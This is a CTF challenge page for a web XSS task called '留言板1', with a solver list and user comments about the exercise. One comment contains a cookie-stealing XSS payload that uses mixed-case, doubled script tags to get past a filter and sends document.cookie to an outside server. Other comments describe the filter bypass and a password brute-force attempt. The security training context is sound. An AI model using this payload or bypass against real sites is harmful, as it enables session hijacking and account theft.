留言板1WEB 未解决
分数:
20
金币:
3
题目作者:
harry
一 血:
18256197318
一血奖励:
5金币
解 决:
143
提 示:
需要xss平台接收flag
描 述:
flag{}
评分(3)
解题动态

tingsi464 攻破了该题 4天前

wechai 攻破了该题 14天前

李师傅 攻破了该题 1月前

happyfmy 攻破了该题 1月前

tfios 攻破了该题 1月前

CTFKnight 攻破了该题 1月前

yanzhenfeng 攻破了该题 1月前

Ktcc5 攻破了该题 2月前

vicleet 攻破了该题 2月前

派大星CTF 攻破了该题 2月前

a1104048658 攻破了该题 3月前

buggy 攻破了该题 3月前

blacklotus0 攻破了该题 3月前

distiny 攻破了该题 4月前

modeng 攻破了该题 4月前

minshenyao 攻破了该题 4月前

vnuesa 攻破了该题 5月前

jugmid 攻破了该题 5月前

ailx10 攻破了该题 5月前

评论
Jesen 4天前
举报
2025年3月17日最新验证,本题获取flag没有问题,请检查是不是之前的payload没有闭合从而影响了后续js代码的正常加载
Rannnn 4天前
举报
换了四个XSS平台和自己搭的flask应用,连请求都收不到啊!!!
ipconfig2023 27天前
举报
题目有问题,希望修复一下,换了几个平台都收不到cookie,在自己服务器上运行的flask应用,收不到来自题目服务器的请求<scsCRiPtript>location.href="http://xx:8081/?flag_cookie="+document.cookie</scsCRiPtript>
feifeifei1212 2月前
举报
xss平台收不到
燃燃然燃 3月前
举报
自定义代码把XSS平台提供的图片https改成http有返回,但是看不到cookie。题目其实就是双写+大小写+空格绕过,对照WP复现XSS平台也没有回显,但是把同样的代码插入runoob的在线实例有回显,大概是环境有问题。
我是CTF大王 5月前
举报
这个题 爆破了十几万条弱密码 狗屁没有,肯定是长密码,怎么下一步
我是CTF大王 5月前
举报
没登录上去,拿cookie干鸡毛
我是CTF大王 5月前
举报
跟上个题目一样,都要登录admin才能拿到cookie,但是账密又改了,怎么获取admin密码???
ailx10 5月前
举报
很简单呀,https://zhuanlan.zhihu.com/p/839767477
MaAp1e 5月前
举报
退钱,XSS平台根本接收不到。